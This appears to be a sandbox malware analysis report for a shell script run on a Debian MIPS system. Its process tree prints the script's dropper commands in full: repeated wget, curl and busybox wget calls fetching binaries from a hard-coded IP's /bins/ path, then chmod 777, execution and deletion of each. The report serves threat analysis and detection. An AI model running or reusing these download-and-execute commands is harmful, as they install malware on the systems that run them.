d91598cbe809a777eda879117574ae48a38a5e5ce754f73085117b25104ef05a

Analysis

max time kernel
150s
max time network
154s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
21-11-2024 08:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d91598cbe809a777eda879117574ae48a38a5e5ce754f73085117b25104ef05a.sh
Size

10KB
MD5

40acb9bbdc30eee90db1699fc64664f0
SHA1

e7f465a62fe2f5943e5c8d4cb0f279f026f536b5
SHA256

d91598cbe809a777eda879117574ae48a38a5e5ce754f73085117b25104ef05a
SHA512

b0d6779c6beb7671facf61f8e5585c55ab7b2b631bac3813ce58bffbffd5993de30f3a8ea75780c9117bbc93739d77c4ef6300ab47e608ee405fb089fc6b6a8d
SSDEEP

192:m5Z/77fdck0awgfSex7RRJkIN18JpAEMVA4og7XDu7iuKGuie7MUZEMVW4ogJpWX:wWWNxmGJjB4

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 23 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
740	chmod
746	chmod
802	chmod
821	chmod
887	chmod
936	chmod
732	chmod
847	chmod
868	chmod
881	chmod
893	chmod
905	chmod
930	chmod
778	chmod
875	chmod
911	chmod
923	chmod
758	chmod
815	chmod
827	chmod
899	chmod
917	chmod
942	chmod

Executes dropped EXE 23 IoCs

Reads runtime system information 24 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 24 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG	curl
File opened for modification	/tmp/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk	curl
File opened for modification	/tmp/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ	curl
File opened for modification	/tmp/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw	curl
File opened for modification	/tmp/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw	curl
File opened for modification	/tmp/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn	curl
File opened for modification	/tmp/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2	curl
File opened for modification	/tmp/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0	curl
File opened for modification	/tmp/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN	curl
File opened for modification	/tmp/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV	curl
File opened for modification	/tmp/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk	curl
File opened for modification	/tmp/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ	curl
File opened for modification	/tmp/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7	curl
File opened for modification	/tmp/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G	curl
File opened for modification	/tmp/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0	curl
File opened for modification	/tmp/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji	curl
File opened for modification	/tmp/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2	curl
File opened for modification	/tmp/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji	curl
File opened for modification	/tmp/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7	curl
File opened for modification	/tmp/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p	curl
File opened for modification	/tmp/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV	curl
File opened for modification	/tmp/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN	curl
File opened for modification	/tmp/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G	curl
File opened for modification	/tmp/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI	curl

/tmp/d91598cbe809a777eda879117574ae48a38a5e5ce754f73085117b25104ef05a.sh
/tmp/d91598cbe809a777eda879117574ae48a38a5e5ce754f73085117b25104ef05a.sh
1⤵
PID:698
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:706
- /usr/bin/wget
  wget http://87.120.125.191/bins/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
  2⤵
  PID:711
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:717
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
  2⤵
  PID:728
- /bin/chmod
  chmod 777 fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
  2⤵
  - File and Directory Permissions Modification
  PID:732
- /tmp/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
  ./fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
  2⤵
  - Executes dropped EXE
  PID:733
- /bin/rm
  rm fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
  2⤵
  PID:735
- /usr/bin/wget
  wget http://87.120.125.191/bins/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI
  2⤵
  PID:736
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:738
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI
  2⤵
  PID:739
- /bin/chmod
  chmod 777 gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI
  2⤵
  - File and Directory Permissions Modification
  PID:740
- /tmp/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI
  ./gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI
  2⤵
  - Executes dropped EXE
  PID:741
- /bin/rm
  rm gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI
  2⤵
  PID:742
- /usr/bin/wget
  wget http://87.120.125.191/bins/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn
  2⤵
  PID:743
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:744
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn
  2⤵
  PID:745
- /bin/chmod
  chmod 777 uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn
  2⤵
  - File and Directory Permissions Modification
  PID:746
- /tmp/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn
  ./uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn
  2⤵
  - Executes dropped EXE
  PID:747
- /bin/rm
  rm uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn
  2⤵
  PID:748
- /usr/bin/wget
  wget http://87.120.125.191/bins/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  2⤵
  PID:749
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:750
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  2⤵
  PID:754
- /bin/chmod
  chmod 777 lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  2⤵
  - File and Directory Permissions Modification
  PID:758
- /tmp/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  ./lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  2⤵
  - Executes dropped EXE
  PID:759
- /bin/rm
  rm lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  2⤵
  PID:761
- /usr/bin/wget
  wget http://87.120.125.191/bins/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  2⤵
  PID:763
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:767
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  2⤵
  PID:775
- /bin/chmod
  chmod 777 vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  2⤵
  - File and Directory Permissions Modification
  PID:778
- /tmp/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  ./vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  2⤵
  - Executes dropped EXE
  PID:779
- /bin/rm
  rm vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  2⤵
  PID:782
- /usr/bin/wget
  wget http://87.120.125.191/bins/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p
  2⤵
  PID:783
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:788
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p
  2⤵
  PID:798
- /bin/chmod
  chmod 777 15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p
  2⤵
  - File and Directory Permissions Modification
  PID:802
- /tmp/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p
  ./15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p
  2⤵
  - Executes dropped EXE
  PID:803
- /bin/rm
  rm 15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p
  2⤵
  PID:806
- /usr/bin/wget
  wget http://87.120.125.191/bins/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG
  2⤵
  PID:807
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:812
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG
  2⤵
  PID:814
- /bin/chmod
  chmod 777 jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG
  2⤵
  - File and Directory Permissions Modification
  PID:815
- /tmp/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG
  ./jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG
  2⤵
  - Executes dropped EXE
  PID:816
- /bin/rm
  rm jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG
  2⤵
  PID:817
- /usr/bin/wget
  wget http://87.120.125.191/bins/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  2⤵
  PID:818
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:819
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  2⤵
  PID:820
- /bin/chmod
  chmod 777 ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  2⤵
  - File and Directory Permissions Modification
  PID:821
- /tmp/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  ./ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  2⤵
  - Executes dropped EXE
  PID:822
- /bin/rm
  rm ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  2⤵
  PID:823
- /usr/bin/wget
  wget http://87.120.125.191/bins/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  2⤵
  PID:824
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:825
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  2⤵
  PID:826
- /bin/chmod
  chmod 777 FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  2⤵
  - File and Directory Permissions Modification
  PID:827
- /tmp/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  ./FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  2⤵
  - Executes dropped EXE
  PID:829
- /bin/rm
  rm FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  2⤵
  PID:831
- /usr/bin/wget
  wget http://87.120.125.191/bins/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  2⤵
  PID:833
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:837
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  2⤵
  PID:844
- /bin/chmod
  chmod 777 S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  2⤵
  - File and Directory Permissions Modification
  PID:847
- /tmp/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  ./S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  2⤵
  - Executes dropped EXE
  PID:848
- /bin/rm
  rm S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  2⤵
  PID:851
- /usr/bin/wget
  wget http://87.120.125.191/bins/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  2⤵
  PID:853
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:857
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  2⤵
  PID:866
- /bin/chmod
  chmod 777 7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  2⤵
  - File and Directory Permissions Modification
  PID:868
- /tmp/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  ./7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  2⤵
  - Executes dropped EXE
  PID:870
- /bin/rm
  rm 7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  2⤵
  PID:871
- /usr/bin/wget
  wget http://87.120.125.191/bins/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  2⤵
  PID:872
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:873
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  2⤵
  PID:874
- /bin/chmod
  chmod 777 NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  2⤵
  - File and Directory Permissions Modification
  PID:875
- /tmp/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  ./NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  2⤵
  - Executes dropped EXE
  PID:876
- /bin/rm
  rm NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  2⤵
  PID:877
- /usr/bin/wget
  wget http://87.120.125.191/bins/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  2⤵
  PID:878
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:879
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  2⤵
  PID:880
- /bin/chmod
  chmod 777 EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  2⤵
  - File and Directory Permissions Modification
  PID:881
- /tmp/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  ./EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  2⤵
  - Executes dropped EXE
  PID:882
- /bin/rm
  rm EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  2⤵
  PID:883
- /usr/bin/wget
  wget http://87.120.125.191/bins/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  2⤵
  PID:884
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:885
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  2⤵
  PID:886
- /bin/chmod
  chmod 777 oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  2⤵
  - File and Directory Permissions Modification
  PID:887
- /tmp/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  ./oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  2⤵
  - Executes dropped EXE
  PID:888
- /bin/rm
  rm oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  2⤵
  PID:889
- /usr/bin/wget
  wget http://87.120.125.191/bins/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  2⤵
  PID:890
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:891
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  2⤵
  PID:892
- /bin/chmod
  chmod 777 FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  2⤵
  - File and Directory Permissions Modification
  PID:893
- /tmp/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  ./FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  2⤵
  - Executes dropped EXE
  PID:894
- /bin/rm
  rm FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
  2⤵
  PID:895
- /usr/bin/wget
  wget http://87.120.125.191/bins/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  2⤵
  PID:896
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:897
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  2⤵
  PID:898
- /bin/chmod
  chmod 777 S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  2⤵
  - File and Directory Permissions Modification
  PID:899
- /tmp/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  ./S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  2⤵
  - Executes dropped EXE
  PID:900
- /bin/rm
  rm S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
  2⤵
  PID:901
- /usr/bin/wget
  wget http://87.120.125.191/bins/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  2⤵
  PID:902
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:903
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  2⤵
  PID:904
- /bin/chmod
  chmod 777 ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  2⤵
  - File and Directory Permissions Modification
  PID:905
- /tmp/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  ./ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  2⤵
  - Executes dropped EXE
  PID:906
- /bin/rm
  rm ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
  2⤵
  PID:907
- /usr/bin/wget
  wget http://87.120.125.191/bins/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  2⤵
  PID:908
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:909
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  2⤵
  PID:910
- /bin/chmod
  chmod 777 EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  2⤵
  - File and Directory Permissions Modification
  PID:911
- /tmp/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  ./EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  2⤵
  - Executes dropped EXE
  PID:912
- /bin/rm
  rm EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
  2⤵
  PID:913
- /usr/bin/wget
  wget http://87.120.125.191/bins/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  2⤵
  PID:914
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:915
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  2⤵
  PID:916
- /bin/chmod
  chmod 777 oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  2⤵
  - File and Directory Permissions Modification
  PID:917
- /tmp/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  ./oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  2⤵
  - Executes dropped EXE
  PID:918
- /bin/rm
  rm oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
  2⤵
  PID:919
- /usr/bin/wget
  wget http://87.120.125.191/bins/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  2⤵
  PID:920
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:921
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  2⤵
  PID:922
- /bin/chmod
  chmod 777 7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  2⤵
  - File and Directory Permissions Modification
  PID:923
- /tmp/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  ./7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  2⤵
  - Executes dropped EXE
  PID:924
- /bin/rm
  rm 7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
  2⤵
  PID:925
- /usr/bin/wget
  wget http://87.120.125.191/bins/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  2⤵
  PID:926
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:927
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  2⤵
  PID:928
- /bin/chmod
  chmod 777 NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  2⤵
  - File and Directory Permissions Modification
  PID:930
- /tmp/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  ./NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  2⤵
  - Executes dropped EXE
  PID:931
- /bin/rm
  rm NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
  2⤵
  PID:932
- /usr/bin/wget
  wget http://87.120.125.191/bins/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  2⤵
  PID:933
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:934
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  2⤵
  PID:935
- /bin/chmod
  chmod 777 lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  2⤵
  - File and Directory Permissions Modification
  PID:936
- /tmp/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  ./lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  2⤵
  - Executes dropped EXE
  PID:937
- /bin/rm
  rm lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
  2⤵
  PID:938
- /usr/bin/wget
  wget http://87.120.125.191/bins/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  2⤵
  PID:939
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:940
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  2⤵
  PID:941
- /bin/chmod
  chmod 777 vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  2⤵
  - File and Directory Permissions Modification
  PID:942
- /tmp/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  ./vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  2⤵
  - Executes dropped EXE
  PID:943
- /bin/rm
  rm vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
  2⤵
  PID:944
- /usr/bin/wget
  wget http://87.120.125.191/bins/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
  2⤵
  PID:945
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:947

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G	733	fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G
/tmp/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI	741	gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI
/tmp/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn	747	uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn
/tmp/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7	759	lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
/tmp/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2	779	vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2
